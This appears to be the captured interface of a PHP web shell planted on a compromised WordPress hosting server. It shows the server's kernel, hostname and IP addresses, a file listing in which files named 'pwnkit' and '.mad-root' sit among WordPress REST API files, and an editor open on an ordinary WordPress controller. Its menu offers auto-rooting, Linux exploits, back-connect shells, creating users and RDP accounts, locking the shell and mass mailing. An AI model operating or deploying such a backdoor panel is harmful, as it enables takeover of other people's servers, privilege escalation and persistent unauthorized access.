Linux webm008.cluster110.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.110.20.8 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
5.4.45
einst
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
einst /
www_1 /
wp-includes /
rest-api /
endpoints /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
class-wp-rest-attachments-cont...
25.43
KB
-rw----r--
class-wp-rest-autosaves-contro...
12.54
KB
-rw----r--
class-wp-rest-block-renderer-c...
4.46
KB
-rw----r--
class-wp-rest-blocks-controlle...
2.64
KB
-rw----r--
class-wp-rest-comments-control...
53.67
KB
-rw----r--
class-wp-rest-controller.php
18.89
KB
-rw----r--
class-wp-rest-post-statuses-co...
9.32
KB
-rw----r--
class-wp-rest-post-types-contr...
9.54
KB
-rw----r--
class-wp-rest-posts-controller...
80.08
KB
-rw----r--
class-wp-rest-revisions-contro...
23.13
KB
-rw----r--
class-wp-rest-search-controlle...
10.03
KB
-rw----r--
class-wp-rest-settings-control...
9.97
KB
-rw----r--
class-wp-rest-taxonomies-contr...
12.01
KB
-rw----r--
class-wp-rest-terms-controller...
30.63
KB
-rw----r--
class-wp-rest-themes-controlle...
6.87
KB
-rw----r--
class-wp-rest-users-controller...
43.94
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-wp-rest-blocks-controller.php
<?php /** * Reusable blocks REST API: WP_REST_Blocks_Controller class * * @package WordPress * @subpackage REST_API * @since 5.0.0 */ /** * Controller which provides a REST endpoint for the editor to read, create, * edit and delete reusable blocks. Blocks are stored as posts with the wp_block * post type. * * @since 5.0.0 * * @see WP_REST_Posts_Controller * @see WP_REST_Controller */ class WP_REST_Blocks_Controller extends WP_REST_Posts_Controller { /** * Checks if a block can be read. * * @since 5.0.0 * * @param object $post Post object that backs the block. * @return bool Whether the block can be read. */ public function check_read_permission( $post ) { // Ensure that the user is logged in and has the read_blocks capability. $post_type = get_post_type_object( $post->post_type ); if ( ! current_user_can( $post_type->cap->read_post, $post->ID ) ) { return false; } return parent::check_read_permission( $post ); } /** * Filters a response based on the context defined in the schema. * * @since 5.0.0 * * @param array $data Response data to fiter. * @param string $context Context defined in the schema. * @return array Filtered response. */ public function filter_response_by_context( $data, $context ) { $data = parent::filter_response_by_context( $data, $context ); /* * Remove `title.rendered` and `content.rendered` from the response. It * doesn't make sense for a reusable block to have rendered content on its * own, since rendering a block requires it to be inside a post or a page. */ unset( $data['title']['rendered'] ); unset( $data['content']['rendered'] ); return $data; } /** * Retrieves the block's schema, conforming to JSON Schema. * * @since 5.0.0 * * @return array Item schema data. */ public function get_item_schema() { $schema = parent::get_item_schema(); /* * Allow all contexts to access `title.raw` and `content.raw`. Clients always * need the raw markup of a reusable block to do anything useful, e.g. parse * it or display it in an editor. */ $schema['properties']['title']['properties']['raw']['context'] = array( 'view', 'edit' ); $schema['properties']['content']['properties']['raw']['context'] = array( 'view', 'edit' ); /* * Remove `title.rendered` and `content.rendered` from the schema. It doesn’t * make sense for a reusable block to have rendered content on its own, since * rendering a block requires it to be inside a post or a page. */ unset( $schema['properties']['title']['properties']['rendered'] ); unset( $schema['properties']['content']['properties']['rendered'] ); return $schema; } }
Close